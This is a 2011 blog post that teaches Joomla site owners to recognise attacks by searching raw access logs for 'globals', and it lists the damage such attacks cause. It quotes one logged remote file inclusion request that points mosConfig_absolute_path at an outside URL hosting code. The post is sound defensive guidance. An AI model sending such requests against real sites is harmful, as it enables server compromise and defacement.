Recognizing a Joomla attack
22 October 2011

Recognizing a Joomla attack

You might wonder what exactly an attack on a Joomla website looks like.

How will you recognize one when you see it?

Firstly you should have access to your Raw Log Files

If you log into your CPanel control panel, one of the icons available is 'Raw Access Logs'. Choose this option, then download the raw log file to your local PC. It comes in the form of a .gz file and you are going to require something like WinRAR to unzip this type of file. The unzipped file is a text file that you can open with a text editor.

Just beware! If you are have a .com domain, the text file will be in the format of yoursitename.com. Coincidentally, '.com' is an executable format for PCs, so if you double-click on this file in an attempt to open it with a text editor, it will try and execute the file. Rather rename the file to yoursitename.com.txt in order to open it with a text editor.

Now that you have the log file open, what should you look for?

Most of these attacks makes use of the GLOBALS setting, so just look for the word 'globals' in your log file.

You might see something like this:

66.11.227.124 - - [15/Sep/2007:00:06:23 -0500] "GET /index2.php?
_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]
=1&GLOBALS=&mosConfig_absolute_path=http://www.somesite.com/echo.txt? 
HTTP/1.1" 403 - "-" "libwww-perl/5.808"

This is a typical example of an attack attempt.

What does this type of attack achieve?

This type of unauthorised entry may try to achieve any of the following:

  • Scan your installation for potential 'weak' components that have security flaws in. This will then give them a list of components that can be attacked to do further damage
  • This can be a straightforward file injection. The attack can consist of replacing your index.php or index.html files to display a 'You have been hacked' message. This is normally called a defacement and is relatively easy to fix by just replacing the infected files. Be warned, though, that this is almost a calling card - just a little message to warn you that you've had some visitors. They will come back (and do more the next time round)
  • More damaging is if they replace not just index files, but other files such as .htaccess files, and in other folders. This makes it much more difficult to fix and sometimes a full restore or reinstall is required
  • Sometimes they leave a backdoor file, such as a trojan, on your machine. This trojan horse can give them full access to your server any time that they like. They can then come in at their leisure later and pretty much do what they want with your server. Such as access your email systems and send out 10000 spam emails from your server. This can make your hosting company close you down even though it is not you sending out the emails.
  • Or they can do a complete defacement of the whole server since they might be able to gain root shell access. They could potentially replace each and every index file on your server meaning that you would have to rebuild the whole server (restore from an uninfected backup)
  • They could get hold of your administrator username and password, log into your Joomla site and destroy your content.

As you can see, these attacks vary in nature but all of them causes inconvenience and embarrassment, if not downright loss of clients and income.

You will also be surprised at the number of attacks - why don't you download your log file and see?

Categories

Security